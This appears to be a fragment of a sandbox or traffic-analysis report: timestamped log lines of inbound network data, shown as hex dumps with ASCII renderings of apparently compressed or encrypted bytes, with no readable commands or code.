2023-11-18 09:02:39 UTC	853	IN	Data Raw: fc cb f4 98 cb 1e 57 d3 a3 7d 47 af ab 40 ac 68 bf 91 82 15 c0 fe 49 5d 8f 3f a7 ca 8f 34 ab 46 3f 46 68 b3 64 9e 02 b4 ba 15 a6 fb cb ca eb f0 ba 37 80 7b d1 b7 53 89 bc 7c 43 9d 58 d7 7e 09 b7 49 0a af a8 9f b9 45 97 97 34 87 63 34 3f e4 47 1a 07 36 d7 57 29 83 1a 5a 8b bd 7c bf 69 3c ef 43 1c f6 d1 5f 03 94 01 f6 2f 74 50 ca f6 37 01 17 f3 3e 86 e7 e5 85 d8 4a f8 35 68 45 c7 9c 10 df 18 94 d6 eb c6 b1 aa f7 43 4b a1 57 60 09 a6 c9 d2 d1 37 d0 b3 55 cd 93 39 ee 47 d7 e8 ff f8 9c a0 4f 53 3b fa c9 e1 23 b0 a5 1d 9d a5 7d aa 7e e7 90 c3 bf b0 6a fd d4 5d 39 94 96 02 e5 bd 72 e8 6f 18 93 b3 af 1c ee 0d 5a 8f c5 d0 6a a4 a8 73 08 1b c0 79 f2 c2 28 0e 29 90 ad 53 05 9a 95 57 4e 11 e5 55 2e c6 03 f2 c1 0c 26 bc 45 30 3d b2 e5 95 20 d8 fb c1 21 3d be ed 35 fd Data Ascii: W}G@hI]?4F?Fhd7{S\|CX~IE4c4?G6W)Z\|i<C_/tP7>J5hECKW`7U9GOS;#}~j]9roZjsy()SWNU.&E0= !=5
2023-11-18 09:02:39 UTC	854	IN	Data Raw: 88 ab e5 a8 7f af 41 45 b7 c2 ba 3c 29 bc 37 78 ab 1d 29 7f 30 91 02 07 55 84 18 38 78 21 e4 b8 b4 e3 be c6 b4 5f 83 27 75 89 af 05 f8 c1 e0 04 3b d8 70 57 d9 63 88 ff bc 1b f8 f3 ff 09 5e 6a cf ed 8a 17 e8 0f eb 08 98 18 a4 33 f0 33 f4 06 94 47 46 2a ad 70 81 16 6c b4 22 d3 24 7f 53 20 43 6b 61 e2 96 6f 2f db db 9d 34 79 f0 f5 19 81 5e 7a a9 44 1b bb 59 bd cc 98 bb 6c 61 89 4c f3 b4 f6 00 a2 e0 df 6c e7 cd 58 f3 41 86 1e 31 e8 d7 57 c0 91 88 be 3a 87 fd 8d 3c 0e cf da cc 3c ed de 7c bd 16 32 4d 56 0b 1d 62 42 88 c2 b8 3d d2 bd 9e c9 aa 43 8c 0c 97 d8 ce 22 f2 38 9e 23 de 2b e9 d7 7a b5 6b 24 7d 8c 4b bb c6 a5 d7 43 15 ad 43 d1 7d b7 75 a8 97 7e 40 67 8c b4 7f 74 59 2c d6 fe 82 75 9e 68 fa 47 6b 9e 94 65 40 06 0b 72 65 9a 31 80 bd 4c 3e 73 a2 75 b9 e6 fc Data Ascii: AE<)7x)0U8x!_'u;pWc^j33GF*pl"$S Ckao/4y^zDYlaLlXA1W:<<\|2MVbB=C"8#+zk$}KCC}u~@gtY,uhGke@re1L>su
2023-11-18 09:02:39 UTC	856	IN	Data Raw: 33 60 a9 03 5f 5f 57 1a e0 07 43 b3 6a eb 95 6a f6 e2 8b a1 21 6b 48 59 9a 86 1c b9 04 44 51 60 06 70 ed 2b 58 7d 40 9e 9d 11 ef 6a 18 6f 67 ba da 28 f9 9b 83 87 f4 ba 89 c8 fd 03 d7 45 aa 6a 8f ea 2f 3f 5a 4f bc b7 14 68 07 c2 77 53 28 2c 8f a5 f8 0d 29 4b f8 46 d6 b8 f3 38 86 ff ac 4e 8b 87 ff 6c e8 03 ea 32 80 9f c7 f3 1e 53 a3 af 45 11 38 16 38 85 4d 5a 88 01 53 59 c8 e8 a6 95 1a f6 87 10 ae d9 b3 7d 8d bd 96 2a 2f b2 c7 c0 2b 6c e5 01 1d 41 1d 9a 68 ed 24 aa 0a 37 f2 eb 66 ea 4c e3 ac cb 07 a1 b9 d6 1d f1 2f 59 83 c8 36 ca 05 bf ad 0c c2 72 50 04 c3 36 31 76 cf 24 18 98 56 d8 a0 1d ed 11 0f e8 34 0b 4d 66 08 bd b8 f0 9b b7 cd 0c 3b 93 36 97 93 ad 80 b0 5e d2 3b 70 a8 1a 59 81 72 14 90 97 80 18 d3 8b b7 c3 4a 9c 05 d3 ac b4 46 af 6f 13 48 d5 7b 44 b2 Data Ascii: 3`__WCjj!kHYDQ`p+X}@jog(Ej/?ZOhwS(,)KF8Nl2SE88MZSY}*/+lAh$7fL/Y6rP61v$V4Mf;6^;pYrJFoH{D
2023-11-18 09:02:39 UTC	880	IN	Data Raw: 51 33 89 e3 d7 71 8e ef a2 95 c1 e2 fd 9c ef 07 91 d3 05 ce 33 29 12 16 58 67 5d 28 d5 d2 b0 43 50 3e e3 ce 35 84 04 07 85 b9 f4 f6 fe 9d 4b db 58 af 29 98 9d 41 30 79 61 58 da 37 e8 8f 4e 92 b1 b3 b9 20 56 dd 0c c0 17 c5 c2 cd 72 b8 27 eb d3 c0 cd 5a 33 7c 1e 4e 27 1a b9 d9 6d d1 f3 8f 62 ac 92 4c 5c 5e 2d ca 56 85 64 ca 96 c3 97 c0 40 d2 6a 83 6b 8d 49 ca b4 e6 44 9f 67 08 cc c6 f0 c1 f0 d1 df c2 46 46 2e db 01 db 10 63 7c 2b 0d e2 4f 80 d6 9b 5c d1 77 61 16 39 90 f7 c8 a1 ef 69 14 b0 2a e4 4a f2 a2 4f 00 ef 67 1d 4e 6c 4e db 01 6b 18 b6 65 66 8f 9e 0f 79 18 5a b1 fb 3c d4 5c 84 42 6d 03 2f 86 40 a8 1e fe 1d d5 d0 a7 12 f2 d8 23 a0 53 30 2e fa 15 01 5b f4 e6 41 c4 c7 04 0a d1 7d 9d bc f0 0b 9c ad 35 51 91 93 c8 7f 80 44 ee e7 88 fe 73 d2 10 45 4e 30 44 Data Ascii: Q3q3)Xg](CP>5KX)A0yaX7N Vr'Z3\|N'mbL\^-Vd@jkIDgFF.c\|+O\wa9i*JOgNlNkefyZ<\Bm/@#S0.[A}5QDsEN0D
2023-11-18 09:02:39 UTC	881	IN	Data Raw: d7 73 4b 9c 20 88 4b a3 c1 30 05 10 00 c6 0d 26 a6 c8 b8 c5 23 87 b6 e0 89 bf 09 98 1c 5e 43 66 da c6 f3 a7 50 a8 be e8 32 ce e7 a7 27 69 80 65 3e a5 01 ae 67 ec f2 0d d8 8f a7 31 f9 e6 db e3 89 46 0b 76 b9 b5 1d 6e 7d f2 fa e1 0e 87 dd c6 77 7f 48 49 38 df a9 01 e5 a1 80 96 8f 0d dc fb 59 b7 22 ff 67 99 2e 93 25 4a be 69 5c 59 ed 6b d4 87 59 f2 82 d7 94 17 7a 91 d0 f8 e0 4a 92 ca 72 a1 85 75 38 ed c3 e6 99 d1 37 4e 5c d9 97 90 25 e6 12 b2 c4 6c 54 7f e8 a7 1e 01 4b 4c fa 04 21 9b 2e e8 89 74 f3 22 45 4d 78 a4 39 c4 78 c5 69 3d ad 52 fd 82 7d f4 b0 8b 34 06 e1 47 b8 8c b4 e8 54 9a 55 a5 74 ed 78 8e 99 17 b8 0f d7 be e9 91 09 c4 0f 1f 69 1e d8 a6 fd 30 70 07 13 5d 8a 23 61 89 d6 aa f2 d6 22 6e a2 10 c8 a3 7d cd 93 60 17 e7 3b 68 e9 6f ef cb 34 63 2e aa 9b Data Ascii: sK K0&#^CfP2'ie>g1Fvn}wHI8Y"g.%Ji\YkYzJru87N\%lTKL!.t"EMx9xi=R}4GTUtxi0p]#a"n}`;ho4c.
2023-11-18 09:02:39 UTC	911	IN	Data Raw: 75 80 ed f5 1c f6 57 3d da 4b 0e dd d9 81 15 66 5a 0c f4 7e a8 6c 41 80 a4 9b 70 0d 2c 2b 45 68 45 01 2e 6d 17 5c 9b 6c 83 fd f9 29 89 36 d8 c7 4e 4e 89 e3 fd b4 8e f8 7e 82 f1 91 b7 24 0e 5a f6 26 ff dd 8c a0 ee 76 39 41 e9 d0 44 cc 0d 4d 82 dd 34 83 7f bc 13 dd e8 32 b3 ef 76 89 77 7b 9c ff 86 19 a2 e1 5f 08 54 bd 25 d8 db 9c d6 f8 4d ed 74 ca 75 5b 61 cd 60 13 4a 0e bf c2 97 c2 69 a9 dd 4e a5 0f 40 a8 1e 06 06 aa 99 ad c3 68 d7 ba 22 6e a0 1a 09 28 13 4c 23 d5 1e 89 03 66 d1 18 f4 0d 68 2c 37 e6 b0 6e 8f db 6a 37 50 cd 53 8c f7 4e 4a b1 ae 6b d9 66 33 50 fd a5 0f eb 59 38 c0 39 21 ef 06 4e aa b0 69 9d fa 12 cb 19 fd ea 20 57 0e 82 32 e0 2f 07 e3 81 3b e1 8a 32 f8 25 b9 2e ba 0a fc a2 99 dc a7 6d 04 0e bb 09 e8 f9 08 e3 5e a6 b9 6f 66 12 cd 1d 4c 9a 2e Data Ascii: uW=KfZ~lAp,+EhE.m\l)6NN~$Z&v9ADM42vw{_T%Mtu[a`JiN@h"n(L#fh,7nj7PSNJkf3PY89!Ni W2/;2%.m^ofL.
2023-11-18 09:02:39 UTC	912	IN	Data Raw: 7d 19 94 6f c1 48 41 13 b1 df 6d 00 e7 93 a9 d0 ef 36 b3 df 3c e2 64 52 7c 93 f2 2c 6d 5c ce 78 1b 3d f2 f8 ec b9 fa b8 0c bd 1e a3 b1 ed 0c 8c 57 57 bf cc e8 d2 a1 37 54 a1 1d e5 0a ba 6b ec 16 50 1e 89 30 c0 20 b7 f6 df aa 7e bd 56 6d ae 64 4d fb 76 c2 68 4f e4 a3 fd 22 1f 6d b0 52 c5 90 53 4f fc 02 6c 23 4b db 31 1e fc 45 1e da 45 77 f2 7b f5 86 39 74 07 5a b5 fe 30 7d 0b dc 02 f7 ed 39 ab 94 7c 67 fd 38 d0 cf 7c 34 3b 5d c3 27 d4 71 f2 3a 88 5e 2d 58 16 d9 60 89 de 69 d9 6d ea 1a d4 e9 7f 47 2e fb 08 8c 00 86 82 c9 f3 f3 91 59 26 bf 0b 12 90 16 d0 25 36 a0 2d ff 9c 5d 07 2c c0 ed f4 02 77 cc e7 e9 c5 19 18 87 77 34 58 6f 78 f4 d1 5e cb 93 d0 bc d5 b4 10 0e 2d 0c 7e 60 76 5b 0a 4c d0 39 05 5a b1 8b 95 d4 8a bd ac 5e 7e 73 bc 25 bf b9 b8 a5 1f 0e 6a ab Data Ascii: }oHAm6<dR\|,m\x=WW7TkP0 ~VmdMvhO"mRSOl#K1EEw{9tZ0}9\|g8\|4;]'q:^-X`imG.Y&%6-],ww4Xox^-~`v[L9Z^~s%j
2023-11-18 09:02:39 UTC	919	IN	Data Raw: af 07 07 8d 32 47 fd 04 a5 8c 65 bf 4a 5e 55 96 0a 58 83 f8 cb 65 8c d0 46 98 68 8e 2e b1 c5 13 32 06 1f 96 f0 e4 1a 18 16 3f 40 cf b3 db 7c 16 1f a6 eb ec 0f f0 63 35 80 c4 36 8a a1 cb c1 f2 6a 72 5c 6e 03 c3 fd 9d 78 bf 7d 87 24 d0 ce 02 f9 f2 4e 8c 70 df 00 11 62 19 ac a8 d0 c2 79 19 36 59 ea 67 87 89 84 9e 3c 6c 63 a9 e1 b3 a1 cf 7c 28 9f bb 98 e6 e5 49 9d a8 71 35 55 97 3a f8 87 ba 30 b6 22 38 02 94 ba b9 29 4b a1 13 87 db 0b 93 86 66 cc 28 3e 63 0a ed e3 6b d6 fe f0 c5 34 71 fa 27 d8 7f 98 68 50 a0 37 e5 2c c9 78 87 71 aa 44 7b 27 26 57 79 31 5e 75 35 6b 77 84 2b 32 47 f4 35 fa 0f cf 2c 62 c2 02 5b ab 5d 31 cd 10 0f c1 5a bd 4f fb d9 b7 cf f7 43 5a 9b cf d0 9a b5 cd d9 1d be 0e df 87 69 1d 6c f5 6e 6b ea 18 a0 35 c3 7a 9d bd 1f ae 9a 69 d2 da d8 a2 Data Ascii: 2GeJ^UXeFh.2?@\|c56jr\nx}$Npby6Yg<lc\|(Iq5U:0"8)Kf(>ck4q'hP7,xqD{'&Wy1^u5kw+2G5,b[]1ZOCZilnk5zi
2023-11-18 09:02:39 UTC	920	IN	Data Raw: cb 48 fd 51 e6 c5 bb 28 f8 45 cb f3 59 6e 90 f2 5b 8c d6 7d 84 c4 85 fb 10 89 1e 86 c4 3d 24 4c 2f 69 09 ed 94 c3 c7 8e a1 bf 30 72 0d c6 38 31 10 e1 30 f4 9b 60 83 7f 2e 4c 4f 6b 8d 99 f0 13 89 71 27 25 7c 2d fd 89 1a 38 e7 27 be 67 ad bf c2 61 b1 38 26 5d 2e 69 64 fc 69 14 93 b0 4f 71 90 e8 d5 8b f8 54 16 79 9c 15 68 5f e1 d4 89 48 85 da bb 4d bb 24 71 33 30 9a f6 73 20 6e c7 3e 51 dd df c9 e6 9e 6a 88 03 37 83 78 d3 74 a8 6d e0 07 69 9b fc 13 94 2c 39 f4 86 19 84 0b a2 e4 db dc ac fe 70 28 16 83 cd 78 f0 6d c6 f2 a6 b1 ee 35 b5 0f 88 9e c4 4f 6b b3 25 62 0f d1 cf 8f c6 19 d2 f4 9f 2c 56 95 2a 87 51 ce 21 12 42 ba f1 ce 63 a2 61 d3 d7 92 d8 6c 9e 03 17 ba 5d 6a a1 c7 a5 66 b9 20 a8 48 73 f0 47 13 63 81 1e 4c 46 15 63 76 f4 9c 4b 4c 2b 0c a6 bf 2c 71 37 Data Ascii: HQ(EYn[}=$L/i0r810`.LOkq'%\|-8'ga8&].idiOqTyh_HM$q30s n>Qj7xtmi,9p(xm5Ok%b,V*Q!Bcal]jf HsGcLFcvKL+,q7
2023-11-18 09:02:39 UTC	922	IN	Data Raw: 6a ec 87 5e 6e cc f5 57 33 e6 f1 1c 45 b1 84 f3 66 d8 dd 12 06 a1 10 44 16 b5 aa cf 00 2b 27 29 e6 a1 58 c0 4f 90 14 96 13 8e 05 d2 75 fd 3d f2 d4 ec 03 b1 05 a9 f7 ff 22 37 b3 fa 93 28 06 46 66 e4 35 08 4b f6 26 98 5a 45 0a 0a 9b be 97 c4 43 d6 06 a7 41 57 dd 32 19 7d d1 03 f8 82 c1 6d b4 0c e5 fe 4e 39 74 3e d4 a1 1b b4 19 64 cd 94 0e 11 4a 40 da fe 15 0c fb c7 a4 c3 d1 a6 83 84 45 8f 5e ea 31 cf 1d 41 36 44 8f 48 b7 62 b4 1b b4 99 c3 8d fe 18 46 4e 92 36 c6 63 23 e9 4b 2d 92 ce 21 92 9e ab e8 8b b1 53 5b f5 7e 81 34 f5 08 9b 8b ff 84 bd fe 0f 7d 21 0a 74 dd 68 27 8e cb 10 8a 3d 39 04 e0 58 1c a0 83 dc 3f c8 2b ef df 23 62 54 a1 da 23 ce d9 7d b4 8f b4 1f 3e fe 1a 26 c1 07 60 20 4d 97 ec a1 8b 2d c8 20 d8 5f f8 17 f5 d8 e2 f7 c0 54 de 75 82 c3 59 73 1e Data Ascii: j^nW3EfD+')XOu="7(Ff5K&ZECAW2}mN9t>dJ@E^1A6DHbFN6c#K-!S[~4}!th'=9X?+#bT#}>&` M- _TuYs
2023-11-18 09:02:39 UTC	923	IN	Data Raw: e7 81 e6 a9 7a 17 69 9e 6e e9 86 c5 47 57 fd 4a d9 8f 08 5d f7 8a d1 ad 3c 10 c6 70 c0 8c 2b 06 b3 04 0e 46 04 39 bc 05 c3 d1 f7 0d 8c d5 06 45 df e4 e0 ec 4e 06 07 ea bf a9 83 12 47 74 d7 f8 a4 4e b2 e6 41 69 3e 3a 1c af fc 93 a2 af 73 4f 86 f3 ba 2b e2 eb 4c 0e 77 6e d7 87 2d 25 45 d8 cb a8 16 4b d4 80 d1 ae 92 2e 38 d1 d7 a1 77 4f 63 6f ba 4c 64 fe 11 90 8b d8 d6 0b 4e 0e e8 9e 91 e2 9a c8 6b a8 71 59 0c 6e 53 7c 17 b3 3c 61 0f f7 34 df c3 5d f7 1f 62 81 97 c0 6f 33 2e 03 97 c3 8d 37 78 85 89 bc e0 55 c9 e4 1f 11 f2 3c 55 b2 db 34 53 ac cc d2 cd 2b 17 72 f8 3e ab 42 71 59 9c df e2 fa e0 6e 07 a5 a1 d9 2b 48 a5 99 e3 2c 41 47 39 92 a0 d8 a6 66 ee 4e da ca c1 b9 26 ad ab 54 a3 9d 97 89 b6 5a 3d 28 ff 85 62 e8 ec 63 df ab dd 80 42 bb 5c 0f 97 9a e9 8b 0d Data Ascii: zinGWJ]<p+F9ENGtNAi>:sO+Lwn-%EK.8wOcoLdNkqYnS\|<a4]bo3.7xU<U4S+r>BqYn+H,AG9fN&TZ=(bcB\
2023-11-18 09:02:39 UTC	924	IN	Data Raw: 0d 6b 3d dc 7c ec 64 38 eb ab 4c d7 da ce 16 1a 9d 68 c2 25 87 e7 b2 1a e6 7f 2d e4 ba 04 39 e4 20 63 ae 97 79 50 17 0f fd e6 78 f8 d5 5c 70 c0 ad 1e ee 21 d7 fd 40 ad 66 45 a6 76 c0 09 5a a4 42 a9 06 3e 5c 4d d2 ac b1 f8 c2 14 4a f6 66 61 54 4b 77 96 b6 19 2f 78 64 79 d3 da d2 f6 2d 73 ca e1 53 25 32 97 d0 53 2f 76 68 22 db 36 5c 5c 24 69 43 a5 da d2 1e 62 f0 82 da d2 54 31 98 55 5b 9a 22 06 cf ac 2d 95 c4 60 46 6d a9 53 0c f6 ab 2d 75 88 41 4f 6d a9 28 06 7b d6 a6 32 59 f7 2e 07 9c 37 84 4c 88 13 36 fd c0 aa a0 79 1e 59 5e 31 f9 08 a0 6a e0 07 64 7d e2 73 d8 b0 1f bc 40 2f 73 39 cb d0 f9 ee 24 d3 72 c5 0c 24 c6 71 5c c8 0b 76 c0 94 af 56 6e 8f 04 28 c2 a7 60 db 19 a3 30 9b c7 e6 c3 14 9a 0f d5 8e b8 f4 ae 9b f1 7c 25 e3 af 33 28 f9 6a 9e 0c a7 a9 7a 0f Data Ascii: k=\|d8Lh%-9 cyPx\p!@fEvZB>\MJfaTKw/xdy-sS%2S/vh"6\\$iCbT1U["-`FmS-uAOm({2Y.7L6yY^1jd}s@/s9$r$q\vVn(`0\|%3(jz
2023-11-18 09:02:39 UTC	926	IN	Data Raw: 6f 4b 69 ed 2b 84 58 5b f4 08 9e 6f 2f 53 9e e7 28 cf eb f4 f6 b8 4d 09 4b 97 94 cc 67 8c 53 16 66 9d 8d 2e a5 f0 c9 dc 35 0e 43 23 23 80 c9 e6 af 45 f0 40 7f f7 b7 50 bf b7 b0 df 21 cf 83 5f 42 68 70 2f 30 35 aa 17 48 ff 15 5a d5 53 10 86 40 c7 e5 30 e8 d6 23 21 74 99 a5 58 fc 01 e3 bf 6f a1 fb 62 3d db cf 67 88 ab cf 85 28 13 02 ad cc 53 b8 ae 20 e7 62 fa 05 83 2d a1 95 44 3a be a8 e7 16 d2 27 90 bf 33 e9 d3 a4 19 ff 38 0e eb fc 9c 89 df 77 4c 8b 9e 42 7e 04 43 fe 82 80 0d 61 80 0d 79 01 21 39 b9 57 17 48 6e 7a 8b bb 88 b2 b5 8b a0 19 f4 7f 0f 4d 46 77 d0 84 4d ff 23 a0 8c f0 83 3d bb 80 f0 cb db 04 c2 6c 0e 82 b0 fa b2 df 09 42 6e 57 10 b8 8c 3f a9 e1 65 0e c2 77 1d d3 38 a5 d5 ae 47 0a 60 28 d1 7a e0 8e e5 65 32 59 5d e1 c4 18 cb 01 b9 17 f8 c8 8a 07 Data Ascii: oKi+X[o/S(MKgSf.5C##E@P!_Bhp/05HZS@0#!tXob=g(S b-D:'38wLB~Cay!9WHnzMFwM#=lBnW?ew8G`(ze2Y]
2023-11-18 09:02:39 UTC	927	IN	Data Raw: ab 63 a4 90 cc 53 58 65 2b 4c f7 27 92 b1 b0 d9 3c 6c 76 6e 26 ea cd 26 10 8a 32 09 e0 07 b3 6d f6 a3 f0 7d f5 5a 09 e2 a0 d4 1d 44 65 7d ae 6f 2b 5b 1e a6 44 4a 06 b8 9d 8c f7 0e a2 fe 1f 3a e4 df 2c d7 c1 2d 04 5a 33 ac b9 78 43 d0 3b f2 3f 8f b0 49 5e 0e f1 89 23 e5 31 8e e4 d6 90 64 f0 e5 90 01 09 5e a8 da 4f be c6 03 cb e7 af 47 48 6b 71 29 3e f5 20 ba 52 21 e8 39 0a bf 53 0d a1 87 58 18 af 9e 9e 82 c3 66 1f af 4b d9 3f ba 4b e1 40 a4 b8 37 01 8a 83 56 a2 94 00 c2 41 0d 53 de 7b d0 03 34 5c 9b 0f 1d e2 e2 00 2c da da c7 be ad 22 fb 14 29 f8 80 0b 03 b0 c2 31 52 02 be 10 03 ff 15 05 4e 07 a2 87 e8 42 9e 19 ac 27 b0 0c a3 a7 65 0d eb 8f b9 bc 47 ca d9 aa ae 05 52 04 00 64 f3 cc 5f b5 c3 be c6 a6 af d9 4a 0e ab 38 63 1e 59 e0 cd cb 36 26 8d 4d ff f5 a4 Data Ascii: cSXe+L'<lvn&&2m}ZDe}o+[DJ:,-Z3xC;?I^#1d^OGHkq)> R!9SXfK?K@7VAS{4\,")1RNB'eGRd_J8cY6&M
2023-11-18 09:02:39 UTC	928	IN	Data Raw: 67 19 99 be 4c b1 c3 4b ed e5 1b 05 3c 4f 08 42 c9 3d f8 8a 04 1b 47 25 79 6f d1 83 67 ba 49 4c 02 3a 2f 0e 74 cb 3f 29 cf 60 5b 63 5e 5b 1d 2f f0 f4 d3 71 1b 62 b6 d0 b4 4b f2 c3 b5 b0 0f bc c8 ef ae b2 af 0b cf f1 22 43 1c 78 cb 41 ae 87 ed f7 f3 e4 90 c7 41 21 3d 8e 9f 24 87 47 70 ee 7a 1e 4c 4d 08 21 16 b9 3a a6 95 e4 54 a9 87 25 79 01 5c 17 a8 fe f7 18 28 c9 bc e3 d4 66 c9 ff ce cc 5f a3 45 71 3e e1 10 13 e7 f7 fd 9c 2f 3c 9d c4 17 5c 6c 77 17 1d 4a f6 5f d0 35 3b 8c c7 5e 25 18 db 44 cb 27 3f 37 7b 33 68 17 d5 8f b8 1c 07 f1 15 21 76 d1 94 fa 93 96 39 e4 d0 45 f0 ba aa 4a 9a 0c 59 27 6b 55 62 67 74 40 62 3c dc 21 27 e0 8b 3f 0a 20 92 db 21 bb e3 59 87 65 a1 f0 f3 2b 92 15 8d e7 3b f6 6c c6 1a c6 38 18 7c d4 46 d7 b4 2e 78 8f df d7 4b 27 91 00 e0 64 Data Ascii: gLK<OB=G%yogIL:/t?)`[c^[/qbK"CxAA!=$GpzLM!:T%y\(f_Eq>/<\lwJ_5;^%D'?7{3h!v9EJY'kUbgt@b<!'? !Ye+;l8\|F.xK'd
2023-11-18 09:02:39 UTC	930	IN	Data Raw: 45 f2 31 35 2c 5b 64 81 25 93 2f e5 99 14 7b a6 91 98 69 be 25 dc cf e6 99 62 a8 58 e0 81 8b ab c8 04 5c e7 69 df 08 5d fb d7 60 eb df 68 9e 6f 1d 9d 2b af e7 26 8e 14 6d 99 4c 49 3d 3c cb e3 dd c4 47 fe e5 05 4a ab 31 8d 0c 33 94 84 b0 bf 12 96 9d 3b 51 6d 15 f1 e4 02 ae 29 2c 51 f2 d5 98 53 0e 87 f9 05 aa 13 5f c0 41 91 0a 79 bc a7 cd cf 4a 56 dc 2a cd 85 8b b4 be 1e 47 d0 b4 74 80 b0 da f3 37 2c 35 c3 a9 70 ba 39 7a 82 19 13 b2 cf 18 46 db 13 97 38 70 e6 18 7f 49 6c b7 f2 59 d0 ef b7 2f 36 fd 93 8c 6e e8 b4 bb fa 3c 4b 70 06 8e 03 4e 5f b2 8c c7 75 66 c4 80 66 fd ea 91 39 b3 7b c8 6f 2d 98 c8 2a 69 69 b0 db 9f c1 cd f4 12 63 b9 d7 ba fd d7 b8 03 29 fd 1b d5 cd d6 ad 3f 0d d1 75 6f 5b 6b 05 9e ff 90 fd 8a 3d 02 e4 96 02 a7 00 b6 29 64 a7 60 a5 bb f2 7b Data Ascii: E15,[d%/{i%bX\i]`ho+&mLI=<GJ13;Qm),QS_AyJVGt7,5p9zF8pIlY/6n<KpN_uff9{o-iic)?uo[k=)d`{
2023-11-18 09:02:39 UTC	931	IN	Data Raw: d8 70 6d b7 b3 bc ba 2a ce f2 5c 4f 49 34 24 6f e1 97 ba 71 29 26 19 cc e1 95 c3 4c 09 f2 8d cd 13 09 75 e4 f3 3a 36 c0 42 84 6f 44 9e 81 02 bc d7 f0 30 1b 14 43 1c d2 89 64 c9 c3 59 b9 5e b4 d5 00 b9 32 59 59 0d cb a2 73 94 d3 6c fd c8 11 a2 3c 21 ba 8f 3f d5 e2 75 98 5f c3 1b a8 e4 3a c8 65 d0 d4 17 bf 63 e6 82 2f d1 f5 14 ca cb f3 a7 24 b6 5b d4 0d db bd f1 71 b4 c4 d1 8e 00 65 cb a1 4e 91 ae ce 69 7d 9c a8 67 2a 5f ce b6 3f 1e bf 43 e2 86 23 a8 05 ce b7 07 ce 8a be 7f 9c 2a e8 0d 21 3e 3e 7a 44 12 b8 21 a7 d6 62 2c 7e 84 36 36 5f 8b 44 1c 5f 73 c9 4c 85 5c 13 14 8f ed 70 0d c7 b1 87 20 e1 66 40 1d 4b 68 c9 06 a1 8e 18 5a 21 4a d2 ef b0 82 7c 76 8c 93 08 61 10 00 44 7b ab d2 1a be 35 10 1a a9 0e de 2d fe 77 98 53 0b b2 7e fa b6 18 4b e5 59 ef 2a be 57 Data Ascii: pm\OI4$oq)&Lu:6BoD0CdY^2YYsl<!?u_:ec/$[qeNi}g_?C#!>>zD!b,~66_D_sL\p f@KhZ!J\|vaD{5-wS~KYW
2023-11-18 09:02:39 UTC	932	IN	Data Raw: e5 8e 71 e9 63 dd da 18 73 b1 9c ed d1 2e d2 ef 92 b4 99 92 7e 97 4b 9b e9 d2 ef 72 6b 33 dd fa 5d 1e 6d a6 47 bf cb ab cd f4 ea 77 a5 6b 33 d3 f5 ab 32 b4 e1 7c b1 d4 6f ca 8d 5c 93 a9 fd 31 53 2f 97 b4 e1 92 5e ee d2 86 bb f4 72 b7 36 dc ad 97 7b b4 e1 1e bd dc ab 0d f7 ea e5 e9 da f0 74 bd 30 43 2b e2 8b e5 51 2e 19 ad 67 5d 8a 36 f2 97 6f fa 74 2f 59 d9 51 52 f9 00 a2 64 1d dc d1 c1 ba 78 f3 fd 24 c7 35 41 3d f7 32 46 bc 1a 14 f5 d1 a5 20 45 fd b5 81 eb 6b d0 f7 b9 4a 91 e0 76 8e d0 b3 a0 2a 32 2e 51 3b 4e 9b dd 83 c9 30 e9 b7 77 4e 63 12 10 78 0f 6b 0b 40 35 83 f0 f1 f7 5c 31 f1 bd 32 e9 bd 22 e1 5d bd 1f 19 ba b6 60 43 f7 9f 37 77 ff f9 3d eb b3 75 fe be 80 4b 02 4c e8 70 ad 16 bb bb 8f 7f 4a 64 82 92 61 c6 bf b0 5d 91 c8 26 3c 58 d8 03 d6 40 ef 0e Data Ascii: qcs.~Krk3]mGwk32\|o\1S/^r6{t0C+Q.g]6ot/YQRdx$5A=2F EkJv*2.Q;N0wNcxk@5\12"]`C7w=uKLpJda]&<X@
2023-11-18 09:02:39 UTC	934	IN	Data Raw: d9 18 bd 2d 6e 19 15 fc c7 32 47 e0 6f f6 12 29 bc c4 f5 58 22 70 8e 3d 2d 95 a7 5d 41 b5 85 a7 c5 6c f7 c9 cb 31 9b be d1 5e 4a e4 a5 5c 54 e3 27 d0 0f dc 84 92 9d 87 95 cf c1 f3 ed 52 a8 f6 4c f0 75 6e 8c ae ea a4 78 52 56 be 7e 3c df 6a cc 17 08 d9 d3 7e e4 69 4b a9 8e d0 a4 58 2c 66 4f ff 09 63 10 c1 f4 9b 56 27 09 49 f6 a6 c9 e6 95 77 83 70 72 76 6b 71 96 d3 34 2f b6 db 55 fe 80 0b 6d 1e d8 55 b6 e0 7d 1a 53 ee 72 a0 1d 59 f0 7d bd 38 0b 06 6a 21 99 93 e9 0f 1b b8 52 04 ce 33 cd 09 0a d5 8e 58 60 22 cb 05 c2 cc 72 3c 57 35 28 5c da 33 51 0d f1 b7 cc 11 bc 17 c2 c5 02 43 c1 8b d6 81 5a bc e6 8e 46 e8 26 34 9b 39 87 63 95 f9 d0 bc 23 f8 02 5e 5b 19 bd 2a 86 f1 fc 37 8b 5a 71 96 3d af 79 1f 87 c3 43 d6 6d f5 08 c1 96 e0 16 02 4b 0e c3 75 2b d8 e9 68 2a Data Ascii: -n2Go)X"p=-]Al1^J\T'RLunxRV~<j~iKX,fOcV'Iwprvkq4/UmU}SrY}8j!R3X`"r<W5(\3QCZF&49c#^[7Zq=yCmKu+h
2023-11-18 09:02:39 UTC	935	IN	Data Raw: 3b 84 f6 45 89 fe 17 b3 93 ca a6 9e a0 ec ae c9 0e cb 03 f1 f5 80 24 98 48 8e 0e 4e f4 6f 9c f9 3b eb 6b 60 f5 d9 ef 3d aa 66 e5 da 37 c5 fd 72 6e 38 99 6b 4b ac 9a 4a 4e 50 53 29 d4 f4 06 48 fb 35 f7 26 1c b7 37 24 cb fb 40 1d 85 26 e0 d0 91 e5 7b 88 32 e0 aa 1c ad 45 5e 55 e8 52 77 39 27 e3 3d 0f 2b 6c d2 b6 49 19 4a 80 7c 48 02 77 60 dc 81 bb 71 04 27 59 b4 e0 fc 9f b4 c0 56 91 63 54 e2 22 a4 03 6e 52 d5 31 13 be cd 3b c3 c4 ed b8 bb e3 b8 6d 77 f1 7d d7 41 28 bd f2 6e 4e 25 15 4a 0e 9f 33 57 26 78 98 35 18 2d 33 b9 f3 74 63 20 5d 3f 85 a2 36 48 c6 9f 66 a2 e6 02 be 6f 0d 36 41 23 07 66 a2 d1 fc 1b c6 f0 7b ec f2 3e 9f 4f 18 e1 a1 46 a9 b4 e6 11 36 c6 78 51 8e 6f 0b c4 05 03 8c 35 89 74 78 b5 c6 16 67 1e 6a 4e bb 1b dd 88 b4 16 e3 9f 33 89 f0 4f 15 ad Data Ascii: 